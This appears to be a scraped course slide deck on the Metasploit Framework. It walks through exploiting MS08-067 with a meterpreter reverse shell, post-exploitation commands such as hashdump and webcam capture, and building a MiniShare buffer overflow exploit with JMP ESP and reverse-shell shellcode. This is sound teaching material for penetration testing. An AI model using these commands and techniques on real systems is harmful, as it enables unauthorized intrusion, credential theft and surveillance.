Adam Helbling Agenda Part 2 From ploit to ploit Overview Assumptions Environment Setup Ollydbg Introduction Vulnerability Explanation Crafting the Exploit Metasploit ID: 477220
Download Presentation The PPT/PDF document "Anthony Gabrielson" is the property of its rightful owner. Permission is granted to download and print the materials on this web site for personal, non-commercial use only, and to display it on your personal computer provided you do not modify the materials and that you retain all copyright notices contained in the materials. By downloading content from our website, you accept the terms of this agreement.
Slide1
Anthony GabrielsonAdam HelblingSlide2
Agenda
Part 2:
From ‘
ploit’ to ‘ploit’OverviewAssumptionsEnvironment SetupOllydbg IntroductionVulnerability ExplanationCrafting the ExploitMetasploit EnablersAdding Shellcode
Part 1:
The
Metasploit
Framework
Basics
Running
Metasploit
The Exploit
Demo
More on ExploitsSlide3
The Metasploit Framework:
Basics
Created in 2003 by HD MooreVitalsBSD License700K lines of RubyCurrently produced by Rapid 7De facto standard in vulnerability development frameworkCommercial AlternativesRapid 7 has many commercial implementationsImmunities CANVASCore ImpactSlide4
The Metasploit Framework:
Basics (cont’d)
Metasploit is a well known anti-forensic and evasion toolModular for ease of development and portabilitymsfupdateGet the latest & greatest exploitsmsfconsoleThe console – also works as a command shell
Exploit Automation
Db_autopwn
Very noisy
Requires a databaseSlide5
The Metasploit Framework:
Running MetasploitSlide6
The Metasploit Framework:
The Exploit
ms08_067_netapi (RANK: Great)This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.This attack can be prevented
with the MS08-
067 patch.Slide7
The Metasploit Framework:
DemoSlide8
The Metasploit Framework:
Demo Walkthrough
Msfconsoleuse exploit/windows/smb/ms08_067_netapiset PAYLOAD windows/meterpreter/reverse_tcpset RHOST [remote host] 192.168.11.51set LHOST [local host] 192.168.11.53show optionsModule options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- -----------
RHOST 192.168.11.51
yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/
meterpreter/reverse_tcp
):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique:
seh
, thread, none, process
LHOST 192.168.11.53
yes The listen address
LPORT 4444 yes The listen port
ExploitSlide9
The Metasploit Framework:
More about the Exploit
msf exploit(ms08_067_netapi) > show targetsExploit targets: Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows XP SP2 English (NX) 4 Windows XP SP3 English (NX)…
61 Windows 2003 SP2 Japanese (NO NX)Slide10
The Metasploit Framework:
Meterpreter
CommandsCommandsmeterpreter > sysinfoSystem Language : en_USOS : Windows XP (Build 2600, Service Pack 2).Computer : AGABRIEL-B90B23Architecture : x86Meterpreter : x86/win32
meterpreter
>
getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter
> shell
Process 396 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
More
Hashdump
Upload
Webcam_snap
keybscan_{start
, stop, dump}
psSlide11
Q: What can you do with a known vulnerability?Craft an exploit, execute from a command-line
What else?
Metasploit is not perfect, but it has its place.
RepositoryFrameworkTools to help build exploitsEase of useGeneric shellcode vs. robust shellcode Challenges:Crafting the exploitReuse of an exploitFrom
ploit
to
ploit
: Overview
…or how to add a generic exploit to your metasploit arsenalSlide12
From ploit to ploit
: Assumptions
Already spent resources (time, money, etc.) to discover a vulnerability via one (or all) of the following:
FuzzingStatic disassemblyReview of source codeKnown vulnerabilityCVE we found on (http://cve.mitre.org/)Security Advisory (http://secunia.com/advisories)Known ExploitExploit DB (http://www.exploit-db.com/exploits
)Slide13
From ploit to ploit
: Environment Setup
Vulnerability:
MiniShare HTTP “GET” Request Buffer Overflow VulnerabilityExploit: MiniShare Remote Buffer Overflow Exploit (c source)Windows XP SP2 (or really any XP version)MiniShare 1.4.1Ollydbg 1.10Backtrack 4Metasplioit
Python
NetcatSlide14
From ploit to ploit
:
Ollydbg
IntroductionMain Pane:CPU Instructions (Microsoft Assembler format)Memory Pane:Current section of memory where the code is executingRegisters Pane:EIP: Address of next instruction to be executedESP: Stack pointerStack Pane:Shows the entries on stackSlide15
From ploit to ploit
: Vulnerability Explanation
HTTP GET with a large (>1787 bytes) request
GET [a string of >1787 bytes] HTTP/1.1\r\n\r\nEIP = 0x41414141Access violation when reading [41414141]EIP points to the address containing the next instruction, but 0x41414141 throws an access violation.ESP = the address of the buffer that was overflowed.Note the “AAAAAAAAAAAAAAAAAA……AAAA”Slide16
From ploit to ploit
: Crafting the Exploit
This approach is different then the lab exercise assigned.
We are not overwriting stack’s return address hereInstead let’s find an instruction in the code to transfer our execution:\xFF\xE4 = JMP ESP – Jump to the address stored in ESP.Overwrite EIP with the address of a JMP ESP instruction.More robust to some degree because we will pick an address that is predictable and will work across more systems.In Win XP SP2 there is no randomization of base location for where DLLs are loaded, therefore if we chose a DLL it will work on each system that loads this DLL.
However, the best choice would be a DLL provided with
MiniShare
, however, there are none, so we revert to using a Windows DLL.Slide17
From ploit to ploit
:
Metasploit
Enablers/pentest/exploits/framework3/tools/pattern_create.rbCreates a unique pattern of a user specified length.Useful for understanding the offsets within the buffer where we overwrite./pentest/exploits/framework3/tools/pattern_offset.rbReturns the location of where EIP is overwritten and where ESP points to.Finds offsets using from the pattern generated by
pattern_create.rb
EIP overwritten at 1787 bytes into our buffer
ESP points to location 1791 bytes into our bufferSlide18
From ploit to ploit
: Adding
Shellcode
Using msfpayload which comes with Metasploit we will create a useful piece of shellcode which creates a reverse shell on a port.What is a reverse shell?Note: Does this give us away?!C style vs. raw output (‘R’ vs. ‘C’)Does anyone see a problem with some of this shellcode?Msfencode
can help us…
Let’s add some NOP’s to help improve stability.
Now all that would need to be done is to add this to
Metasploit
as a ruby script. (Note: It’s already in there)Slide19
References and Conclusions
http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html
This presentation just begins to scratch the surface
http://www.offensive-security.com/metasploit-unleashed/Metasploitable Questions?Slide20
The Metasploit Framework:
The Exploit (2)
psexeclight-weight telnet-replacement that lets you execute processes on other systemsThis module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.This one has more, list ‘emSlide21
The Exploit (3)
ms05_039_pnp
Vulnerability in Plug and Play Could Allow Remote Code Execution and Elevation of Privilege
This module exploits a stack buffer overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. NOTE: Since the PnP service runs inside the service.exe process, a failed exploit attempt will cause the system to automatically reboot.Affected Systems: Win2k SP4, Win XP SP2, etc…